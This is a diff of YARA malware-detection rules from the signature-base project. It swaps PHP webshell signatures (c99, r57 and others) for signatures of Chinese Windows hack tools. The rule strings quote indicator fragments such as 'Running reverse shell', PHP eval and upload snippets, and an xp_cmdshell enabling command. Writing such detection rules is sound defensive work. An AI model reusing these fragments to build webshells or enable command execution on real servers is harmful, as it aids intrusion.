 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f44dc1ff243b234a718e8dbd5cc8c4dc8eb9d3b63300a5c6ff72b86280607bf"
+		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
+		logic_hash = "f7f8302c70c5aed1885724a1bca4efdf0547cc5be62e7dd6bcd8cc2079f71f96"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "c99ftpbrutecheck"
-		$s1 = "$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);" fullword
-		$s2 = "$fqb_lenght = $nixpwdperpage;" fullword
-		$s3 = "$sock = @ftp_connect($host,$port,$timeout);" fullword
+		$s0 = "c:\\Documents and Settings\\Administrator\\" ascii
+		$s1 = "Got WMI process Pid: %d" ascii
+		$s2 = "This exploit will execute" ascii
+		$s6 = "Found token %s " ascii
+		$s7 = "Running reverse shell" ascii
+		$s10 = "wmiprvse.exe" fullword ascii
+		$s12 = "SELECT * FROM IIsWebInfo" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 820KB and 3 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_Wacking_Php_Php_C99Shell_V1_0_Php_Php_C99Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_Dos_Look : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5350-L5366"
+		description = "Chinese Hacktool Set - file look.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "910d1469-9173-5a7d-91ea-a50ee921f662"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L713-L728"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e9cd7425b806f71d8889f5df7f3fc2f4a692279fc4e495104646cfe28c5b5fe5"
+		hash = "e1a37f31170e812185cf00a838835ee59b8f64ba"
+		logic_hash = "341c72eaa5db1953e008423374c3f322de0f8dc33fd8181362172982b52e2b8a"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash2 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash3 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$sqlquicklaunch[] = array(\""
-		$s1 = "else {echo \"<center><b>File does not exists (\".htmlspecialchars($d.$f).\")!<"
+		$s1 = "<description>CHKen QQ:41901298</description>" fullword ascii
+		$s2 = "version=\"9.9.9.9\"" fullword ascii
+		$s3 = "name=\"CH.Ken.Tool\"" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE__Antichat_Php_Php_Fatalshell_Php_Php_A_Gedit_Php_Php
+rule SIGNATURE_BASE_Ntgodmode : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6bf5640f-0773-5d93-8d27-0844062017c7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5367-L5383"
+		description = "Chinese Hacktool Set - file NtGodMode.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3de620bf-0405-536b-9f6d-3a7f02417b20"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L730-L747"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "789340845aeed4accaef02afa1a1fe420e73b6f5af1b621f4ec2342994045278"
+		hash = "8baac735e37523d28fdb6e736d03c67274f7db77"
+		logic_hash = "55efa908ebfcede207d3fe0b1072cce262af0e627e91ba8746e7a8924b8e75bd"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"
-		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"
-		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword
-		$s1 = "if($action==\"phpeval\"){" fullword
-		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword
-		$s3 = "$dir=getcwd().\"/\";" fullword
+		$s0 = "to HOST!" fullword ascii
+		$s1 = "SS.EXE" fullword ascii
+		$s5 = "lstrlen0" fullword ascii
+		$s6 = "Virtual" fullword ascii
+		$s19 = "RtlUnw" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 45KB and all of them
 }
-rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_Sses_Php_Php
+rule SIGNATURE_BASE_Webcrack4_Routerpasswordcracking : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5384-L5397"
+		description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e3d50ff8-e58d-5c60-9acd-25ba95a21f68"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L749-L766"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2bdf4187ff3d63e4af5c70e8cc93cd8fac3257b33c38764ad2bb2e206066162"
+		hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"
+		logic_hash = "48456f82163806852ecef3d71c2c8247f6c74c31ce28472c80a914a98247bdb3"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "if (!empty($delerr)) {echo \"<b>Deleting with errors:</b><br>\".$delerr;}" fullword
+		$s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii
+		$s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii
+		$s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii
+		$s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii
+		$s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
 }
-rule SIGNATURE_BASE__Crystal_Php_Nshell_Php_Php_Load_Shell_Php_Php
+rule SIGNATURE_BASE_Hscan_Gui : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "a92134cd-7f10-589f-bcda-508bc7a20efe"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5398-L5413"
+		description = "Chinese Hacktool Set - file hscan-gui.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "27f9d2e9-0a62-57ca-9061-c32945c59c7e"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L768-L783"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71a9310b19b66e3699f75f551cc604f535ea843eb9c50f4a009edcd9c11e01b9"
+		hash = "1885f0b7be87f51c304b39bc04b9423539825c69"
+		logic_hash = "c87cfe78324638ac9d35c7fd1e47f24014c470b0892ceceaf394278d9706157b"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "fdbf54d5bf3264eb1c4bff1fac548879"
-		hash1 = "4a44d82da21438e32d4f514ab35c26b6"
-		hash2 = "0c5d227f4aa76785e4760cdcff78a661"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
-		$s1 = "$dires = $dires . $directory;" fullword
-		$s4 = "$arr = array_merge($arr, glob(\"*\"));" fullword
+		$s0 = "Hscan.EXE" fullword wide
+		$s1 = "RestTool.EXE" fullword ascii
+		$s3 = "Hscan Application " fullword wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE__Nst_Php_Php_Cybershell_Php_Php_Img_Php_Php_Nstview_Php_Php
+rule SIGNATURE_BASE_S_Multifunction_Scanners_S : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cc4dc0e9-dbb1-560b-ae36-23d3e16a407f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5414-L5430"
+		description = "Chinese Hacktool Set - file s.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fb90a59-116d-5fa7-b85b-cbb1af660666"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L785-L809"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afc0b1c83644aa323d308471e5978b6b03f444f5f46fbaddac28ff42d524df1e"
+		hash = "79b60ffa1c0f73b3c47e72118e0f600fcd86b355"
+		logic_hash = "96f0692c54d74388f8602a03475d95a2fcd89692dd189f9363592745a70c234b"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
-		hash1 = "ef8828e0bc0641a655de3932199c0527"
-		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
-		hash3 = "4745d510fed4378e4b1730f56f25e569"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@$rto=$_POST['rto'];" fullword
-		$s2 = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
-		$s3 = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
+		$s0 = "C:\\WINDOWS\\temp\\pojie.exe /l=" fullword ascii
+		$s1 = "C:\\WINDOWS\\temp\\s.exe" fullword ascii
+		$s2 = "C:\\WINDOWS\\temp\\s.exe tcp " fullword ascii
+		$s3 = "explorer.exe http://www.hackdos.com" fullword ascii
+		$s4 = "C:\\WINDOWS\\temp\\pojie.exe" fullword ascii
+		$s5 = "Failed to read file or invalid data in file!" fullword ascii
+		$s6 = "www.hackdos.com" fullword ascii
+		$s7 = "WTNE / MADE BY E COMPILER - WUTAO " fullword ascii
+		$s11 = "The interface of kernel library is invalid!" fullword ascii
+		$s12 = "eventvwr" fullword ascii
+		$s13 = "Failed to decompress data!" fullword ascii
+		$s14 = "NOTEPAD.EXE result.txt" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 4 of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_Dc3_Security_Crew_Shell_Priv_Php_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_HKTL_CN_Dos_Getpass : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d22c4cc3-842b-5a24-bf4b-a8024b447b9e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5431-L5447"
+		description = "Chinese Hacktool Set - file GetPass.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08635096-474c-5fdf-825e-6c7c8c8d4061"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "Dos_GetPass"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L811-L830"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7a4c74912caa1855efc3a2ea7fa6d0082f62776d77a211e59f12892d4883f240"
+		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
+		logic_hash = "ea1410984fb1f66422faa943f1f16873f4e0d5ff1afa68c2d28f36889e214a52"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "433706fdc539238803fd47c4394b5109"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"
-		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword
+		$s0 = "GetLogonS" ascii
+		$s3 = "/showthread.php?t=156643" ascii
+		$s8 = "To Run As Administ" ascii
+		$s18 = "EnableDebugPrivileg" fullword ascii
+		$s19 = "sedebugnameValue" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 890KB and all of them
 }
-rule SIGNATURE_BASE__C99Shell_V1_0_Php_Php_C99Php_1_C2007_Php_Php_C100_Php
+rule SIGNATURE_BASE_HKTL_CN_Update_Pcmain : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5448-L5463"
+		description = "Chinese Hacktool Set - file PcMain.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24c9ba6f-0772-59c9-8bea-3a8bf7823e4c"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "update_PcMain"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L832-L858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a5dc73a12d8c8b89bab77b90cb3b561e9daf9db5f5ad550326a2fbce52c1c8da"
-		score = 75
+		hash = "aa68323aaec0269b0f7e697e69cce4d00a949caa"
+		logic_hash = "aa905379f65a8d964b921f2b74b61d94f97536466a7fc48f05c437d617cf35f6"
+		score = 90
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash2 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash3 = "d089e7168373a0634e1ac18c0ee00085"
-		hash4 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		tags = "FILE"
 
 	strings:
-		$s0 = "$result = mysql_query(\"SHOW PROCESSLIST\", $sql_sock); " fullword
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322" ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
+		$s2 = "SOFTWARE\\Classes\\HTTP\\shell\\open\\command" fullword ascii
+		$s3 = "\\svchost.exe -k " ascii
+		$s4 = "SYSTEM\\ControlSet001\\Services\\%s" fullword ascii
+		$s9 = "Global\\%s-key-event" fullword ascii
+		$s10 = "%d%d.exe" fullword ascii
+		$s14 = "%d.exe" fullword ascii
+		$s15 = "Global\\%s-key-metux" fullword ascii
+		$s18 = "GET / HTTP/1.1" fullword ascii
+		$s19 = "\\Services\\" ascii
+		$s20 = "qy001id=%d;qy001guid=%s" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 4 of them
 }
-rule SIGNATURE_BASE_Multiple_Php_Webshells_2
+rule SIGNATURE_BASE_HKTL_CN_Dos_Sys : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5464-L5484"
+		description = "Chinese Hacktool Set - file sys.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c4b740f2-f4f8-59ff-ad1f-c06718040b50"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "Dos_sys"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L860-L878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26fe586ba7f4d1931b2df81aa27543ff422e699fd56b6b1be289a0f8d6954691"
+		hash = "b5837047443f8bc62284a0045982aaae8bab6f18"
+		logic_hash = "3b3f55c45ebfe4ab6d8e6b06a3c452c84d4f755f984d913c683a49a8fd570d9d"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash5 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
-		hash6 = "09609851caa129e40b0d56e90dfc476c"
-		hash7 = "671cad517edd254352fe7e0c7c981c39"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "elseif (!empty($ft)) {echo \"<center><b>Manually selected type is incorrect. I"
-		$s1 = "else {echo \"<center><b>Unknown extension (\".$ext.\"), please, select type ma"
-		$s3 = "$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";" fullword
+		$s0 = "'SeDebugPrivilegeOpen " fullword ascii
+		$s6 = "Author: Cyg07*2" fullword ascii
+		$s12 = "from golds7n[LAG]'J" fullword ascii
+		$s14 = "DAMAGE" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE__W_Php_Php_C99Madshell_V2_1_Php_Php_Wacking_Php_Php_1_Specialshell_99_Php_Php
+rule SIGNATURE_BASE_HKTL_CN_Dat_Xpf : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4915146e-141c-5515-ac5a-61901d42dc40"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5485-L5503"
+		description = "Chinese Hacktool Set - file xpf.sys"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fe2de535-4f86-5c29-b67e-153423a897f7"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "dat_xpf"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L880-L897"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "160adf93d4f9e51022c427b2b0601207dd9ca917e98d99e2013fe83e09a85d21"
+		hash = "761125ab594f8dc996da4ce8ce50deba49c81846"
+		logic_hash = "c46b10ef17a9fee2be15fc9cc8b8aeec94d656b86e7208e1ad1f5efcd95fddf5"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
-		hash1 = "3ca5886cd54d495dc95793579611f59a"
-		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
-		hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
-		hash4 = "09609851caa129e40b0d56e90dfc476c"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if ($total === FALSE) {$total = 0;}" fullword
-		$s1 = "$free_percent = round(100/($total/$free),2);" fullword
-		$s2 = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" fullword
-		$s3 = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" fullword
+		$s1 = "UnHook IoGetDeviceObjectPointer ok!" fullword ascii
+		$s2 = "\\Device\\XScanPF" wide
+		$s3 = "\\DosDevices\\XScanPF" wide
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE__R577_Php_Php_R57_Php_Php_Spy_Php_Php_S_Php_Php
+rule SIGNATURE_BASE_HKTL_CN_Project1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "022d2255-50cd-500b-8d91-8e34f3c46fcf"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5504-L5520"
+		description = "Chinese Hacktool Set - file Project1.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "12cc7a82-d7a9-58c6-b283-3bb0df477cd8"
+		date = "2015-06-13"
+		modified = "2023-01-06"
+		old_rule_name = "Project1"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L899-L916"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ba3d6927dc06bfcd98ee9d7146164ca9a9024ef26eac60fabc8ed1375db618d"
+		hash = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
+		logic_hash = "c26590f13a185eb42a27d27e6b5996f7fdf4d5c146fb74062686f356ec4db47d"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
-		hash1 = "eddf7a8fde1e50a7f2a817ef7cece24f"
-		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"
-		hash3 = "817671e1bdc85e04cc3440bbd9288800"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$res = mssql_query(\"select * from r57_temp_table\",$db);" fullword
-		$s2 = "'eng_text30'=>'Cat file'," fullword
-		$s3 = "@mssql_query(\"drop table r57_temp_table\",$db);" fullword
+		$s1 = "EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'" fullword ascii
+		$s2 = "Password.txt" fullword ascii
+		$s3 = "LoginPrompt" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE__Nixrem_Php_Php_C99Shell_V1_0_Php_Php_C99Php_NIX_REMOTE_WEB_SHELL_V_0_5_Alpha_Lite_Public_Version_Php
+rule SIGNATURE_BASE_Arp_EMP_V1_0 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated "
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L5521-L5538"
+		description = "Chinese Hacktool Set - file Arp EMP v1.0.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b2552f26-47ac-5fa0-941e-d674f9deccac"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L918-L931"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f7575db2c8f147d03d5b93b431d1a73c4182b5db6e801e672914778b2042a712"
+		hash = "ae4954c142ad1552a2abaef5636c7ef68fdd99ee"
+		logic_hash = "e46b0f730945dad3c75b6865f30005f4d5fa09c53e3a27c275ca22da9cc89e8d"
 		score = 75
 		quality = 85
-		tags = ""
-		super_rule = 1
-		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
-		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
-		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
-		hash3 = "f3ca29b7999643507081caab926e2e74"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
-		$s1 = "$ret = posix_kill($pid,$sig);" fullword
-		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
-		$s3 = "$i = $nixpasswd;" fullword
+		$s0 = "Arp EMP v1.0.exe" fullword wide
 
 	condition:
-		2 of them
